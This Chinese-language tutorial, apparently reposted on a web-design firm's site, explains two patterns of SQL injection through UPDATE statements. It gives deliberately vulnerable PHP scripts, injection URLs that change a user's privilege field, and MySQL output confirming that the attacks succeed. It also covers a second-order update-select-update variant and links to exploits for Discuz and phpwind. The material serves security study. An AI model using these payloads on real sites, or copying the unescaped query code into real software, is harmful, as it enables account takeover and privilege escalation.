今天就跟大家聊聊有關(guān)UPDATE注射的兩個(gè)模式是什么,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結(jié)了以下內(nèi)容,希望大家根據(jù)這篇文章可以有所收獲。
目前成都創(chuàng)新互聯(lián)已為數(shù)千家的企業(yè)提供了網(wǎng)站建設(shè)、域名、網(wǎng)站空間、網(wǎng)站托管運(yùn)營(yíng)、企業(yè)網(wǎng)站設(shè)計(jì)、墊江網(wǎng)站維護(hù)等服務(wù),公司將堅(jiān)持客戶(hù)導(dǎo)向、應(yīng)用為本的策略,正道將秉承"和諧、參與、激情"的文化,與客戶(hù)和合作伙伴齊心協(xié)力一起成長(zhǎng),共同發(fā)展。一.測(cè)試環(huán)境:
OS: Windowsxp sp2
php: php 4.3.10 (
mysql 4.1.9
apache 1.3.33
二.測(cè)試數(shù)據(jù)庫(kù)結(jié)構(gòu):
----start---
-- 數(shù)據(jù)庫(kù): `test`
--
-- --------------------------------------------------------
--
-- 表的結(jié)構(gòu) `userinfo`
--
CREATE TABLE `userinfo` (
`groudid` varchar(12) NOT NULL default ’1’,
`user` varchar(12) NOT NULL default ’heige’,
`pass` varchar(122) NOT NULL default ’123456’
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
--
-- 導(dǎo)出表中的數(shù)據(jù) `userinfo`
--
INSERT INTO `userinfo` VALUES (’2’, ’heige’, ’123456’);
------end-------
三.測(cè)試模式:
1,變量沒(méi)有帶’’或""[MOD1]
<?php
//test1.php Mod1
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫(kù)連接失敗");
$sql = "update userinfo set pass=$p where user=’heige’";//<--$P沒(méi)有使用單引號(hào)
$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);
echo "
SQL Query:$sql
";
?>
腳本里只是修改user=’heige’的pass,如果groudid表示用戶(hù)的權(quán)限等級(jí),我們的目的就是通過(guò)構(gòu)造$p 來(lái)達(dá)
到修改groupid的目的:
那么我們提交:http://127.0.0.1/test1.php?p=123456,groudid=1
在mysql里查詢(xún): mysql> select * from userinfo;
+---------+-------+--------+
| groudid | user | pass |
+---------+-------+--------+
| 1 | heige | 123456 |
+---------+-------+--------+
1 row in set (0.01 sec)
用戶(hù)heige的groudid又2改為1了 :)
所以我們可以得到?jīng)]有’’或"" update的注射是可以成功的,這個(gè)就是我們的模式1。
2,變量帶’’或""[MOD2]
?php
//test2.php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫(kù)連接失敗");
$sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用單引號(hào)
$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);
echo "
SQL Query:$sql
";
?>
為了關(guān)閉’我們構(gòu)造$p應(yīng)該為123456’,groudid=’2 提交:
http://127.0.0.1/test2.php?p=123456’,groudid=’1 在gpc=on的情況下’變成了’
提交的語(yǔ)句變成:SQL Query:update userinfo set pass=’123456’,groudid=’1’ where user=’heige’
mysql查詢(xún):
mysql> select * from userinfo;
+---------+-------+--------------------+
| groudid | user | pass |
+---------+-------+--------------------+
| 2 | heige | 123456’,groudid=’1 |
+---------+-------+--------------------+
1 row in set (0.00 sec)
groudid并沒(méi)有被修改。那么在變量被’’或""時(shí) 就完全沒(méi)有被注射呢?不是 下面我們看模式2: <?php
//test3.php Mod2
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫(kù)連接失敗");
$sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用單引號(hào)
$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result); //$p的數(shù)據(jù)寫(xiě)入數(shù)據(jù)庫(kù)
$sql= "select pass from userinfo where user=’heige’";
$result = mysql_db_query($dbname, $sql);
$userinfo=mysql_fetch_array($result);
echo $userinfo[0]; //把pass查詢(xún)輸出給$userinfo[0]
$sql ="update userinfo set pass=’$userinfo[0]’ where user=’heige’";
$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result); //把$userinfo[0] 再次update
?>
我們測(cè)試下,提交:http://127.0.0.1/test3.php?p=123456’,groudid=’1
回mysql查詢(xún)下 : mysql> select * from userinfo;
+---------+-------+--------+
| groudid | user | pass |
+---------+-------+--------+
| 1 | heige | 123456 |
+---------+-------+--------+
1 row in set (0.00 sec)
HaHa~~ 成功注射 修改groudid為1。 這個(gè)就是我們的模式2了,簡(jiǎn)單的描敘如下:
update-->select-->update
四.實(shí)際模式
模式1:Discuz 2.0/2.2 register.php 注射
漏洞分析:http://4ngel.net/article/41.htm
Discuz 2.0/2.2 register.php Remote Exploit :http://4ngel.net/project/discuz_reg.htm
模式2:phpwind 2.0.2和3.31e 權(quán)限提升漏洞
漏洞分析:
update (profile.php 注射變量為$proicon update語(yǔ)句里為,icon=’$userdb[icon]’)
|
v
select (jop.php)
|
v
updtate (jop.php)
Exploit:http://www.huij.net/9xiao/up/phpwind-exploit.exe
看完上述內(nèi)容,你們對(duì)UPDATE注射的兩個(gè)模式是什么有進(jìn)一步的了解嗎?如果還想了解更多知識(shí)或者相關(guān)內(nèi)容,請(qǐng)關(guān)注創(chuàng)新互聯(lián)-成都網(wǎng)站建設(shè)公司行業(yè)資訊頻道,感謝大家的支持。
網(wǎng)站欄目:UPDATE注射的兩個(gè)模式是什么-創(chuàng)新互聯(lián)
URL分享:http://m.rwnh.cn/article26/ddscjg.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站內(nèi)鏈、商城網(wǎng)站、網(wǎng)站建設(shè)、云服務(wù)器、做網(wǎng)站、營(yíng)銷(xiāo)型網(wǎng)站建設(shè)
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶(hù)投稿、用戶(hù)轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話(huà):028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)
猜你還喜歡下面的內(nèi)容